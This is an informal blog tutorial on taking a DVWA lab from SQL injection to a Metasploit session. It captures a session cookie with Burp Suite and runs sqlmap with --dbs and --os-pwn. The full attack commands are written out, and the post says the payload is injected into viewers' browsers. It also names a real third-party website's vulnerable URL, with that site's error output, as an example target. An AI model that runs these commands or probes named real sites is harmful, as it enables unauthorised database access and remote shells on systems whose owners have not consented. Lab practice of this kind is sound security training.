Saturday, August 17, 2019

Sql injection to Metasploit session

Wassap people i am him the one and only laughing man back with ye another post this one on sql injection to metasploit session I know most you thinking laughing man you talking shit well sorry lads I’m not metasploit framework has many uses not just for payloads the can do almost anything from recon to exploiting so for this iv set up a lad with dvwa so lets start lads

What is sql injection

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.

Find out more here

what is Metasploit Framework

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.

Find out more here

What is Dvwa

DVWA is a DAMM VULNERABLE WEB APP coded in PHP/MYSQL. Seriously it is too vulnerable. In this app security professionals, ethical hackers test their skills and run this tools in a legal environment. It also helps web developer better understand the processes of securing web applications and teacher/students to teach/learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerability, with various difficulties levels.

Find out more here

what is burp suite

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.
Find out more here

What is sqlmap

sqlmap is an open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious codes into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.
Find out more here

How to preform the attack

first of all we get a are target this my target http://192.168.8.101/DVWA/vulnerabilities/sqli//DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# now i have my target i can check is it vulnerable to sql injection so what we do is put a ‘ right after the 1 in the url so the url looks like this http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1'&Submit=Submit#
Hacking A Rise sqlmptometa-300x75
once you see this
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 message when you add the ‘ at the end the of the url for example http://www.asfaa.org/members.php?id=1'
Hacking A Rise example-255x300
as u see in this image when we add the ‘ at the end the url it tells us theres a error ”
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67″
when we get this error we can use tools like sqlmap , burp suite etc

Now we need to set up the burpsute proxy’s in firefox so type about:preferences in to the url bar in firefox to get the settings scroll down to network
Hacking A Rise set-burpsuite--300x300
and the proxy for burp suite
Hacking A Rise proxyset-300x287

now we load up burp suite open the terminal type burp suite or go to the top left of the screen to applications and to web applications analysis and click burp suite
Hacking A Rise set-burpsuite--300x300

now when we add the ‘ to the url burp suite will pop up
Hacking A Rise thecookie--300x130

The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0
Hacking A Rise cookie2-300x11

now we open a new terminal and type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs

Hacking A Rise sqlmapcheck-215x300

now we type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"

Hacking A Rise sessionslmap-300x169

now we pick the payload i mostly pick php
Hacking A Rise payloadsetsql-300x153

this will add the payload to the site and inject it to the browser of the views
Hacking A Rise to-show-it-was-connected--300x21

show the proof it was connected
Hacking A Rise proof-the-connection-300x83

there ya have it lads and gals how to use sqlmap to get a metasploit session dont use this for the wrong reasons hacking is agen the law unless you have consent of owner

Posted by at
Labels: , , , , , ,

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)